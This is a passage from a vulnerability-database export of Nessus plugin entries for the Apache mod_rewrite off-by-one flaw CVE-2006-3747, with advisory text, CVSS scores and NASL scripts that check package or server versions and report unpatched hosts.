value:\"cpe:/o:novell:opensuse:10.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ 
\"^(SUSE10\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.1\", reference:\"apache2-2.2.0-21.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"apache2-prefork-2.2.0-21.7\") ) flag++;\nif ( rpm_check(release:\"SUSE10.1\", reference:\"apache2-worker-2.2.0-21.7\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:00", "description": "This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2007-01-17T00:00:00", "title": "Fedora Core 4 : httpd-2.0.54-10.4 (2006-862)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2007-01-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "p-cpe:/a:fedoraproject:fedora:httpd-devel", "p-cpe:/a:fedoraproject:fedora:httpd-manual", "cpe:/o:fedoraproject:fedora_core:4", "p-cpe:/a:fedoraproject:fedora:httpd-debuginfo", "p-cpe:/a:fedoraproject:fedora:mod_ssl"], "id": "FEDORA_2006-862.NASL", "href": "https://www.tenable.com/plugins/nessus/24161", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2006-862.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24161);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2006-862\");\n\n script_name(english:\"Fedora Core 4 : httpd-2.0.54-10.4 (2006-862)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes a security issue in the mod_rewrite module.\n\nMark Dowd of McAfee Avert Labs reported an off-by-one security problem\nin the LDAP scheme handling of the mod_rewrite module. Where\nRewriteEngine was enabled, and for certain RewriteRules, this could\nlead to a pointer being written out of bounds. (CVE-2006-3747)\n\nThe ability to exploit this issue is dependent on the stack layout for\na particular compiled version of mod_rewrite. 
The Fedora project has\nanalyzed Fedora Core 4 and 5 binaries and determined that these\ndistributions are vulnerable to this issue. However this flaw does not\naffect a default installation of Fedora Core; users who do not use, or\nhave not enabled, the Rewrite module are not affected by this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2006-July/000462.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dbd04221\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/01/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 4.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC4\", reference:\"httpd-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"httpd-debuginfo-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"httpd-devel-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"httpd-manual-2.0.54-10.4\")) flag++;\nif (rpm_check(release:\"FC4\", reference:\"mod_ssl-2.0.54-10.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:20:49", "description": "The remote host appears to be running a version of Apache which is\nolder than 1.3.37. 
\n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.", "edition": 28, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2008-03-26T00:00:00", "title": "Apache < 1.3.37 mod_rewrite LDAP Protocol URL Handling Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_1_3_37.NASL", "href": "https://www.tenable.com/plugins/nessus/31654", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(31654);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_bugtraq_id(19204);\n script_xref(name:\"EDB-ID\", value:\"3680\");\n \n script_name(english:\"Apache < 1.3.37 mod_rewrite LDAP Protocol URL Handling Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote version of Apache is vulnerable to an off-by-one buffer\noverflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of Apache which is\nolder than 1.3.37. 
\n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jul/671\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive//443870\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to version 1.3.37 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/03/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/07/28\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_end_attributes();\n\n summary[\"english\"] = \"Checks for version of Apache\";\n \n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts 
here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, 'Apache');\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\n\nif (version =~ '^1(\\\\.3)?$') audit(AUDIT_VER_NOT_GRANULAR, 'Apache', port, version);\nif (version !~ \"^\\d+(\\.\\d+)*$\") audit(AUDIT_NONNUMERIC_VER, 'Apache', port, version);\nif (version =~ '^1\\\\.3' && ver_compare(ver:version, fix:'1.3.37') == -1)\n{\n if (report_paranoia > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 1.3.37\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:20:50", "description": "The remote host appears to be running a version of Apache that is older \nthan 2.0.59.\n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.", "edition": 29, "cvss3": {"score": 7.3, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"}, "published": "2008-03-26T00:00:00", "title": "Apache < 2.0.59 mod_rewrite LDAP Protocol URL Handling Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": 
"2021-01-02T00:00:00", "cpe": ["cpe:/a:apache:http_server"], "id": "APACHE_2_0_59.NASL", "href": "https://www.tenable.com/plugins/nessus/31655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(31655);\n script_version(\"1.28\");\n script_cvs_date(\"Date: 2018/11/15 20:50:25\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_bugtraq_id(19204);\n \n script_name(english:\"Apache < 2.0.59 mod_rewrite LDAP Protocol URL Handling Overflow\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote version of Apache is vulnerable to an off-by-one buffer\noverflow attack.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be running a version of Apache that is older \nthan 2.0.59.\n\nThis version contains an off-by-one buffer overflow in the mod_rewrite\nmodule.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2006/Jul/671\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://archive.apache.org/dist/httpd/CHANGES_2.0\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.0.59 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n 
script_set_attribute(attribute:\"plugin_publication_date\", value: \"2008/03/26\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/07/28\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\nscript_end_attributes();\n\n \n script_summary(english:\"Checks for version of Apache\");\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Web Servers\");\n script_dependencie(\"apache_http_version.nasl\");\n script_require_keys(\"installed_sw/Apache\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\n#\n# The script code starts here\n#\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"install_func.inc\");\n\nget_install_count(app_name:\"Apache\", exit_if_zero:TRUE);\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:\"Apache\", port:port, exit_if_unknown_ver:TRUE);\n\n# Check if we could get a version first, then check if it was\n# backported\nversion = get_kb_item_or_exit('www/apache/'+port+'/version', exit_code:1);\nbackported = get_kb_item_or_exit('www/apache/'+port+'/backported', exit_code:1);\n\nif (report_paranoia < 2 && backported) audit(AUDIT_BACKPORT_SERVICE, port, \"Apache\");\nsource = get_kb_item_or_exit('www/apache/'+port+'/source', exit_code:1);\n\n# Check if the version looks like either ServerTokens Major/Minor\n# was used\nif (version =~ '^2(\\\\.0)?$') exit(1, \"The banner from the Apache server listening on port \"+port+\" - \"+source+\" - is not granular enough to make a determination.\");\nif (version !~ \"^\\d+(\\.\\d+)*$\") exit(1, \"The version of Apache listening on port \" + port + \" - \" + version + \" - is non-numeric and, therefore, cannot be used to make a determination.\");\nif (version =~ 
'^2\\\\.0' && ver_compare(ver:version, fix:'2.0.59') == -1)\n{\n if (report_verbosity > 0)\n {\n report = \n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.0.59\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"Apache\", port, install[\"version\"]);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200608-01\n(Apache: Off-by-one flaw in mod_rewrite)\n\n An off-by-one flaw has been found in Apache's mod_rewrite module by\n Mark Dowd of McAfee Avert Labs. This flaw is exploitable depending on\n the types of rewrite rules being used.\n \nImpact :\n\n A remote attacker could exploit the flaw to cause a Denial of Service\n or execution of arbitrary code. Note that Gentoo Linux is not\n vulnerable in the default configuration.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 26, "published": "2006-08-04T00:00:00", "title": "GLSA-200608-01 : Apache: Off-by-one flaw in mod_rewrite", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-04T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-200608-01.NASL", "href": "https://www.tenable.com/plugins/nessus/22143", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-01.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22143);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"GLSA\", value:\"200608-01\");\n\n script_name(english:\"GLSA-200608-01 : Apache: Off-by-one flaw in mod_rewrite\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-01\n(Apache: Off-by-one flaw in mod_rewrite)\n\n An off-by-one flaw has been found in Apache's mod_rewrite module by\n Mark Dowd of McAfee Avert Labs. This flaw is exploitable depending on\n the types of rewrite rules being used.\n \nImpact :\n\n A remote attacker could exploit the flaw to cause a Denial of Service\n or execution of arbitrary code. 
Note that Gentoo Linux is not\n vulnerable in the default configuration.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/Announcement2.0.html\"\n );\n # http://www.apache.org/dist/httpd/Announcement1.3.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a26cbb9f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Apache users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose www-servers/apache\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n 
script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/apache\", unaffected:make_list(\"rge 1.3.34-r14\", \"rge 1.3.37\", \"ge 2.0.58-r2\"), vulnerable:make_list(\"lt 2.0.58-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:17", "description": "New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, and -current to fix a security issue with mod_rewrite.", "edition": 25, "published": "2006-08-04T00:00:00", "title": "Slackware 10.0 / 10.1 / 10.2 / 8.1 / 9.0 / 9.1 / current : Apache httpd (SSA:2006-209-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3747"], "modified": "2006-08-04T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:8.1", "cpe:/o:slackware:slackware_linux:9.0", "cpe:/o:slackware:slackware_linux:9.1", "cpe:/o:slackware:slackware_linux:10.1", "cpe:/o:slackware:slackware_linux:10.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:10.2", "p-cpe:/a:slackware:slackware_linux:apache", "p-cpe:/a:slackware:slackware_linux:mod_ssl"], "id": "SLACKWARE_SSA_2006-209-01.NASL", "href": 
"https://www.tenable.com/plugins/nessus/22152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2006-209-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22152);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-3747\");\n script_xref(name:\"SSA\", value:\"2006-209-01\");\n\n script_name(english:\"Slackware 10.0 / 10.1 / 10.2 / 8.1 / 9.0 / 9.1 / current : Apache httpd (SSA:2006-209-01)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New Apache packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, and -current to fix a security issue with mod_rewrite.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2006&m=slackware-security.610131\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cdfa00c4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache and / or mod_ssl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Module mod_rewrite LDAP Protocol Buffer Overflow');\n 
script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/28\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) 
